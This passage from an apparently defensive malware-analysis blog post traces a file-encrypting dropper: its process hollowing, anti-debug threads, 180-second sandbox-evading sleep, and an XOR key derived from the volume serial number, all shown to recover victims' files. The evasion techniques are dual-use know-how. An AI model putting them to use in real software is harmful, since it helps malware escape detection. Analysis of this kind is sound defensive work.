&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-2T-uBn8Ib0w/UHC83FUkrKI/AAAAAAAAANU/eAe3_ICvO-w/s1600/encrypt2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="412" src="http://3.bp.blogspot.com/-2T-uBn8Ib0w/UHC83FUkrKI/AAAAAAAAANU/eAe3_ICvO-w/s640/encrypt2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;The process and its RUN key&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-BkzSDA2aMqo/UHC83uMlEaI/AAAAAAAAANY/7MToW0akvG0/s1600/encrypt3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-BkzSDA2aMqo/UHC83uMlEaI/AAAAAAAAANY/7MToW0akvG0/s1600/encrypt3.PNG" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;List of compromised files&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-hrf83w2L13Y/UHC84SCMfKI/AAAAAAAAANg/p98OSVFrlog/s1600/encrypt4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-hrf83w2L13Y/UHC84SCMfKI/AAAAAAAAANg/p98OSVFrlog/s1600/encrypt4.PNG" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Disclaimer claiming to be able to contact Microsoft to recover the files&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It looked like the very first 100 bytes where overwritten, with no kind of logical (the null bytes where randomly overwritten). No basic encryption here then. I'll have to go further.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ZcFpIANuKr0/UHAiKF4JFKI/AAAAAAAAAKk/KM7--wloMWQ/s1600/file.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="522" src="http://4.bp.blogspot.com/-ZcFpIANuKr0/UHAiKF4JFKI/AAAAAAAAAKk/KM7--wloMWQ/s640/file.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Above : encrypted file - Below : original file&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Dropping the Paypload&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;br /&gt;
The dropper uses basic tricks to avoid debugging. It's not packed nor protected, but does massive usage of &lt;a href="http://msdn.microsoft.com/fr-fr/library/64tkc9y5%28v=vs.80%29.aspx" target="_blank"&gt;GetProcAddress&lt;/a&gt; to make the routine detection more difficult. I found nothing useful by first looking at the dropper in OllyDbg, so I went to APIMonitor.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What APIMonitor showed is fun :)&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
The dropper was indeed trying to escape of debugging by also create threads and new processes:&lt;br /&gt;
&lt;br /&gt;
- First, It creates new thread and quit the main thread &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qnpbNG0LwIQ/UHAj9_FxH0I/AAAAAAAAAKw/ZTYKgXLEYNo/s1600/apiMonThread.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="174" src="http://4.bp.blogspot.com/-qnpbNG0LwIQ/UHAj9_FxH0I/AAAAAAAAAKw/ZTYKgXLEYNo/s640/apiMonThread.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
- Then, the second&amp;nbsp; thread fires a new process&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-YdlYf6L-2f8/UHAj87LXZOI/AAAAAAAAAKs/GnYCIIjFIGc/s1600/apiMonProcess.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://3.bp.blogspot.com/-YdlYf6L-2f8/UHAj87LXZOI/AAAAAAAAAKs/GnYCIIjFIGc/s640/apiMonProcess.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="color: #134f5c;"&gt;&lt;i&gt;Let's see this in OllyDB!&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
After setting a breakpoint into GetProcAddress (kernel32.dll), I found the place where &lt;i&gt;&lt;b&gt;CreateThread&lt;/b&gt;&lt;/i&gt; was called.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-ltdIb7M7xxU/UHAvJiZd1OI/AAAAAAAAALk/E2wraviWteA/s1600/getProc.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="192" src="http://4.bp.blogspot.com/-ltdIb7M7xxU/UHAvJiZd1OI/AAAAAAAAALk/E2wraviWteA/s640/getProc.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;I could then place a breakpoint into the StartAddress (&lt;b&gt;0x00C70000&lt;/b&gt;) of the thread to break into it.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-SCEP2XcxWGs/UHAqwifnvcI/AAAAAAAAALI/pjSztm8PS60/s1600/CreateThread.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="160" src="http://3.bp.blogspot.com/-SCEP2XcxWGs/UHAqwifnvcI/AAAAAAAAALI/pjSztm8PS60/s640/CreateThread.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In this new Thread, I've done the same to find the place where &lt;i&gt;&lt;b&gt;CreateProcess &lt;/b&gt;&lt;/i&gt;was called.&lt;br /&gt;
It was recreating a new process over the same file! (quite unusual, as we could expect some infinite loop).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-4dV4YFyqv8Y/UHAroZ_MQ-I/AAAAAAAAALQ/co5zWULwHOo/s1600/CreateProcess.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://1.bp.blogspot.com/-4dV4YFyqv8Y/UHAroZ_MQ-I/AAAAAAAAALQ/co5zWULwHOo/s640/CreateProcess.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In fact, the process is created using the flag&lt;b&gt; CREATE_SUSPENDED &lt;/b&gt;(see the "PUSH 4" before the call), and later we will see a &lt;i&gt;&lt;b&gt;WriteProcessMemory&lt;/b&gt;&lt;/i&gt;, and then a &lt;i&gt;&lt;b&gt;ResumeThread&lt;/b&gt;&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
The &lt;i&gt;&lt;b&gt;WriteProcessMemory &lt;/b&gt;&lt;/i&gt;routine is indeed&lt;b&gt; writing a whole new PE at StartAddress (0x400000) of our new process, completely overwriting itself&lt;/b&gt;. I've made a dump of this code section, &lt;b&gt;it's a standalone PE (our Payload)&lt;/b&gt;. We will analyse it right after.&lt;br /&gt;
&lt;br /&gt;
To finish &lt;i&gt;&lt;b&gt;ResumeThread &lt;/b&gt;&lt;/i&gt;resumes the new process (which is now a brand new one, with nothing in common with our dropper).&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-DmjhLCtf55Q/UHAvo8eZQwI/AAAAAAAAALs/aQkJLELwj1Q/s1600/WriteProcessMem.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="222" src="http://1.bp.blogspot.com/-DmjhLCtf55Q/UHAvo8eZQwI/AAAAAAAAALs/aQkJLELwj1Q/s640/WriteProcessMem.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-jiNqWid1-jE/UHAvy-Di8pI/AAAAAAAAAL0/z-eMB8nrNYE/s1600/ResumeThread.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="118" src="http://4.bp.blogspot.com/-jiNqWid1-jE/UHAvy-Di8pI/AAAAAAAAAL0/z-eMB8nrNYE/s640/ResumeThread.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The Paypload is detected as Generic (quite bad) in Virus Total :&lt;br /&gt;
&lt;a href="https://www.virustotal.com/file/8387e5d7e76a3c36708ca50eed438245a5906fa4ed07c6229621b1798a13bced/analysis/"&gt;https://www.virustotal.com/file/8387e5d7e76a3c36708ca50eed438245a5906fa4ed07c6229621b1798a13bced/analysis/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Analysing the Payload&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;span style="font-weight: normal;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;span style="font-size: small;"&gt;Once the payload dumped, and loaded into OllyDbg, we can have a quick overview by looking into the strings and intermodular calls. And this is indeed our encrypter :)&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;span style="font-size: small;"&gt;What is remarkable is the call to the APIs : &lt;i&gt;&lt;b&gt;FindFirstFile&lt;/b&gt;&lt;/i&gt;, &lt;i&gt;&lt;b&gt;FindNextFile &lt;/b&gt;&lt;/i&gt;(files enumeration), &lt;i&gt;&lt;b&gt;CreateFile &lt;/b&gt;&lt;/i&gt;(file opening), and &lt;i&gt;&lt;b&gt;WriteFile &lt;/b&gt;&lt;/i&gt;(file overwriting).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-vOIsHWNI_Mg/UHCCZemORJI/AAAAAAAAAMo/ES8q36Ui9HY/s1600/dumped_calls1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-vOIsHWNI_Mg/UHCCZemORJI/AAAAAAAAAMo/ES8q36Ui9HY/s1600/dumped_calls1.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://3.bp.blogspot.com/-90eZeVnmD0Y/UHCCZ9JOvqI/AAAAAAAAAMs/5enrZZRgUtU/s1600/dumped_calls2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-90eZeVnmD0Y/UHCCZ9JOvqI/AAAAAAAAAMs/5enrZZRgUtU/s1600/dumped_calls2.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://2.bp.blogspot.com/-HmM6d48EemM/UHCCakk0zJI/AAAAAAAAAM0/w3z3wTXijLo/s1600/dumped_calls3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-HmM6d48EemM/UHCCakk0zJI/AAAAAAAAAM0/w3z3wTXijLo/s1600/dumped_calls3.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://1.bp.blogspot.com/-lNnlzH23Dgw/UHCCbGAG3TI/AAAAAAAAAM8/vJx1JB9p5qQ/s1600/dumped_strings.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="http://1.bp.blogspot.com/-lNnlzH23Dgw/UHCCbGAG3TI/AAAAAAAAAM8/vJx1JB9p5qQ/s640/dumped_strings.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;After loading it into API Monitor, we have a dynamic overview of the scheme of file overwriting. This will be useful to understand where to search for a way to decrypt them. We can see the scheme: &lt;i&gt;&lt;b&gt;SetFileAttributes&lt;/b&gt;&lt;/i&gt;, &lt;i&gt;&lt;b&gt;CreateFile&lt;/b&gt;&lt;/i&gt;, &lt;i&gt;&lt;b&gt;ReadFile&lt;/b&gt;&lt;/i&gt;, and then &lt;i&gt;&lt;b&gt;WriteFile &lt;/b&gt;&lt;/i&gt;(with &lt;b&gt;100 bytes&lt;/b&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-D5YnL0TWVcw/UHDAja_nzzI/AAAAAAAAAOI/3-mBAcZqLI8/s1600/apimon1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="356" src="http://4.bp.blogspot.com/-D5YnL0TWVcw/UHDAja_nzzI/AAAAAAAAAOI/3-mBAcZqLI8/s640/apimon1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-5bOLmpLmFE4/UHDABcsvaoI/AAAAAAAAAOA/weEm1iuWxK4/s1600/apimon1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-yNifyTtQMmU/UHC_ZCuOZgI/AAAAAAAAAN4/o9zgbCWoJEM/s1600/apimon1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;In OllyDBG, I quickly found where the &lt;i&gt;&lt;b&gt;ReadFile &lt;/b&gt;&lt;/i&gt;and &lt;i&gt;&lt;b&gt;WriteFile &lt;/b&gt;&lt;/i&gt;were performed. &lt;i&gt;&lt;b&gt;WriteFile &lt;/b&gt;&lt;/i&gt;was indeed done on &lt;b&gt;the firsts 100 bytes (0x64)&lt;/b&gt;, as expected (see API Monitor capture above).&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-efqu6inQINo/UHDBBZaufqI/AAAAAAAAAOQ/MZioiFkOvMc/s1600/read.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="104" src="http://3.bp.blogspot.com/-efqu6inQINo/UHDBBZaufqI/AAAAAAAAAOQ/MZioiFkOvMc/s640/read.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-cPiSnrx-Nkw/UHDBCG9V1KI/AAAAAAAAAOU/ZlwAFuzh0rQ/s1600/write.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="98" src="http://1.bp.blogspot.com/-cPiSnrx-Nkw/UHDBCG9V1KI/AAAAAAAAAOU/ZlwAFuzh0rQ/s640/write.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;Interesting thing, this malware was doing a &lt;b&gt;Sleep of 180 seconds to evade some sanboxes&lt;/b&gt;. For debugging purposes, I nopped this call to avoid waiting for nothing :)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-xjqA0t47TO4/UHDBgIHW2qI/AAAAAAAAAOg/l9okuiKzE1I/s1600/Sleep.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="84" src="http://2.bp.blogspot.com/-xjqA0t47TO4/UHDBgIHW2qI/AAAAAAAAAOg/l9okuiKzE1I/s640/Sleep.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;To finish, I found where the file was encrypted, and how. It was a "simple" &lt;b&gt;XOR routine&lt;/b&gt;, with a key of &lt;b&gt;&lt;span style="color: #073763;"&gt;-1398550687&lt;/span&gt; (ASCII)&lt;/b&gt;, on my VM.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;I suspected the key to be dynamically build, and not hardcoded.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-nw7bvvFiZAE/UHDDJaSpVqI/AAAAAAAAAOw/UwOCtqRquEo/s1600/encKey.PNG" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="342" src="http://4.bp.blogspot.com/-nw7bvvFiZAE/UHDDJaSpVqI/AAAAAAAAAOw/UwOCtqRquEo/s640/encKey.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Key's buffer&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-NmHSjFZo6s8/UHDCsOyBLCI/AAAAAAAAAOo/lHMvx8tCjik/s1600/encrroutine.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="282" src="http://2.bp.blogspot.com/-NmHSjFZo6s8/UHDCsOyBLCI/AAAAAAAAAOo/lHMvx8tCjik/s640/encrroutine.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;XOR routine&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;Let's find the key!&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;In my tale to find the key, I ran into the fact that the malware was calling an API called &lt;b&gt;&lt;i&gt;GetVolumeInformation &lt;/i&gt;&lt;/b&gt;right before the call to the routine to XOR the file. My little finger told me it was important to get the key, so I put a breakpoint on the return buffer of this API.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-UxiN5WphmEU/UHDEBBQsH2I/AAAAAAAAAO4/Q6QlcgqcclU/s1600/getvolinfo.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-UxiN5WphmEU/UHDEBBQsH2I/AAAAAAAAAO4/Q6QlcgqcclU/s1600/getvolinfo.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;Indeed, it was important. Once the routine responsible for key's computing found, I saw that &lt;b&gt;the Volume serial number was the only thing able to change the key's content&lt;/b&gt;.In the main loop, the "Push EDI" was pushing the volume serial number onto the stack for later use.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;The key's routine is displayed above. This is not very clear, but nevermind.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="color: black;"&gt;It translated it into C++ code below for being able to restore the files.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-wfcep2kFCbY/UHDEovh1HaI/AAAAAAAAAPA/rz_JN7gmNA4/s1600/encRoutine1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="241" src="http://4.bp.blogspot.com/-wfcep2kFCbY/UHDEovh1HaI/AAAAAAAAAPA/rz_JN7gmNA4/s640/encRoutine1.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;main loop for key's computing&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-fkKuh_otZic/UHDEpcOClzI/AAAAAAAAAPE/JmPybakDIE4/s1600/encRoutine2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="382" src="http://3.bp.blogspot.com/-fkKuh_otZic/UHDEpcOClzI/AAAAAAAAAPE/JmPybakDIE4/s640/encRoutine2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;First part of key's routine&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QOsO3qcssHw/UHDEqW4uC2I/AAAAAAAAAPM/j_1i5kfRqfU/s1600/encRoutine3.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="177" src="http://1.bp.blogspot.com/-QOsO3qcssHw/UHDEqW4uC2I/AAAAAAAAAPM/j_1i5kfRqfU/s640/encRoutine3.PNG" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Second part of key's routine&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-weight: normal;"&gt;The keys also needs another parameter to find the first ASCII character (here, a "-"). &lt;b&gt;It's the buffer size (0x64), which is hardcoded in the data section&lt;/b&gt;. I'll hardcode myself too next.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-_xVr8kTUbOM/UHDHr9vuZeI/AAAAAAAAAPo/hyT465r7jeQ/s1600/length.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" src="http://3.bp.blogspot.com/-_xVr8kTUbOM/UHDHr9vuZeI/AAAAAAAAAPo/hyT465r7jeQ/s640/length.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
